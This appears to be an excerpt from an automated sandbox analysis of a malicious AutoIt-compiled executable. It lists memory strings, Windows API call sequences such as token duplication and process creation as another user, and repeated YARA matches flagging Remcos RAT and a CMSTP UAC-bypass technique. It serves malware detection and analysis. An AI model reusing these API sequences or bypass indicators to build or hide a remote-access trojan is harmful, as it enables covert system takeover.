                  Source: name.exe, 00000004.00000002.2054778566.00000000000D5000.00000040.00000001.01000000.00000004.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_5c8f98c1-1
                  Source: name.exe, 0000000B.00000002.2181378905.00000000000D5000.00000040.00000001.01000000.00000004.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_95c98581-9
                  Source: name.exe, 0000000B.00000002.2181378905.00000000000D5000.00000040.00000001.01000000.00000004.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_ebf983c2-8
                  Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00C73633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,0_2_00C73633
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CFC27C ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,0_2_00CFC27C
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CFC220 NtdllDialogWndProc_W,0_2_00CFC220
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CFC49C PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,0_2_00CFC49C
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CFC788 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,0_2_00CFC788
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CFC8EE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,0_2_00CFC8EE
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CFC86D SendMessageW,NtdllDialogWndProc_W,0_2_00CFC86D
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CFCBF9 NtdllDialogWndProc_W,0_2_00CFCBF9
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CFCBAE NtdllDialogWndProc_W,0_2_00CFCBAE
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CFCB50 NtdllDialogWndProc_W,0_2_00CFCB50
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CFCB7F NtdllDialogWndProc_W,0_2_00CFCB7F
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CFCC2E ClientToScreen,NtdllDialogWndProc_W,0_2_00CFCC2E
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CFCDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00CFCDAC
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CFCD6C GetWindowLongW,NtdllDialogWndProc_W,0_2_00CFCD6C
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00C71287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,745AC8D0,NtdllDialogWndProc_W,0_2_00C71287
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00C71290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,0_2_00C71290
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CFD6C6 NtdllDialogWndProc_W,0_2_00CFD6C6
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00C716DE GetParent,NtdllDialogWndProc_W,0_2_00C716DE
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00C716B5 NtdllDialogWndProc_W,0_2_00C716B5
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00C7167D NtdllDialogWndProc_W,0_2_00C7167D
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CFD74C GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,0_2_00CFD74C
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00C7189B NtdllDialogWndProc_W,0_2_00C7189B
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CFDA9A NtdllDialogWndProc_W,0_2_00CFDA9A
                  Source: C:\Users\user\Desktop\jv4ri.exe Code function: 0_2_00CFBF4D NtdllDialogWndProc_W,CallWindowProcW,0_2_00CFBF4D
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_00023633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,2_2_00023633
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_000AC220 NtdllDialogWndProc_W,2_2_000AC220
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_000AC27C ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,2_2_000AC27C
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_000AC49C PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,2_2_000AC49C
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_000AC788 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,2_2_000AC788
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_000AC86D SendMessageW,NtdllDialogWndProc_W,2_2_000AC86D
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_000AC8EE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,2_2_000AC8EE
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_000ACB50 NtdllDialogWndProc_W,2_2_000ACB50
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_000ACB7F NtdllDialogWndProc_W,2_2_000ACB7F
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_000ACBAE NtdllDialogWndProc_W,2_2_000ACBAE
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_000ACBF9 NtdllDialogWndProc_W,2_2_000ACBF9
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_000ACC2E ClientToScreen,NtdllDialogWndProc_W,2_2_000ACC2E
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_000ACD6C GetWindowLongW,NtdllDialogWndProc_W,2_2_000ACD6C
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_000ACDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_000ACDAC
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_00021287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,745AC8D0,NtdllDialogWndProc_W,2_2_00021287
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_00021290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,2_2_00021290
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_0002167D NtdllDialogWndProc_W,2_2_0002167D
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_000216B5 NtdllDialogWndProc_W,2_2_000216B5
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_000AD6C6 NtdllDialogWndProc_W,2_2_000AD6C6
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_000216DE GetParent,NtdllDialogWndProc_W,2_2_000216DE
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_000AD74C GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,2_2_000AD74C
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0002189B NtdllDialogWndProc_W,2_2_0002189B
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000ADA9A NtdllDialogWndProc_W,2_2_000ADA9A
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_000ABF4D NtdllDialogWndProc_W,CallWindowProcW,2_2_000ABF4D
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CD40B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,0_2_00CD40B1
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CC8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74765590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,0_2_00CC8858
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CD545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00CD545F
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0008545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_0008545F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,5_2_004167EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,12_2_004167EF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 00402213 appears 38 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 004052FD appears 32 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0040417E appears 46 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 00402093 appears 100 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 00401E65 appears 68 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 00434E70 appears 108 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 00401FAB appears 38 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 004020DF appears 40 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 00434801 appears 82 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 00457AA8 appears 34 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 00445951 appears 56 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0044854A appears 36 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 00411FA2 appears 32 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 004046F7 appears 34 times
Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: String function: 00048B40 appears 42 times
Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: String function: 00040D27 appears 70 times
Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: String function: 00027F41 appears 35 times
Source: C:\Users\user\Desktop\jv4ri.exe | Code function: String function: 00C90D27 appears 70 times
Source: C:\Users\user\Desktop\jv4ri.exe | Code function: String function: 00C98B40 appears 42 times
Source: C:\Users\user\Desktop\jv4ri.exe | Code function: String function: 00C77F41 appears 35 times
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3712 -s 736
Source: jv4ri.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 12.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 (reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23)
Source: 12.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants (Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda)
Source: 12.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM (author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003))
Source: 11.2.name.exe.36c0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 (reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23)
Source: 11.2.name.exe.36c0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants (Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda)
Source: 11.2.name.exe.36c0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM (author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003))
Source: 2.2.name.exe.3f80000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 (reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23)
Source: 2.2.name.exe.3f80000.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants (Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda)
Source: 2.2.name.exe.3f80000.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM (author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003))
Source: 4.2.name.exe.36b0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 (reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23)
Source: 4.2.name.exe.36b0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants (Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda)
Source: 4.2.name.exe.36b0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM (author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003))
Source: 12.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 (reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23)
Source: 12.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants (Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda)
Source: 12.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM (author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003))
Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 (reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23)
Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants (Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda)
Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM (author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003))
Source: 4.2.name.exe.36b0000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 (reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23)
Source: 4.2.name.exe.36b0000.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants (Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda)
Source: 4.2.name.exe.36b0000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM (author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003))
Source: 11.2.name.exe.36c0000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 (reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23)
Source: 11.2.name.exe.36c0000.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants (Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda)
Source: 11.2.name.exe.36c0000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM (author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003))
Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 (reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23)
Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants (Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda)
Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM (author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003))
Source: 2.2.name.exe.3f80000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 (reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23)
Source: 2.2.name.exe.3f80000.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants (Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda)
Source: 2.2.name.exe.3f80000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM (author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003))
Source: 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 (reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23)
Source: 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants (Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda)
Source: 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM (author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003))
Source: 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 (reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23)
                  Source: 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
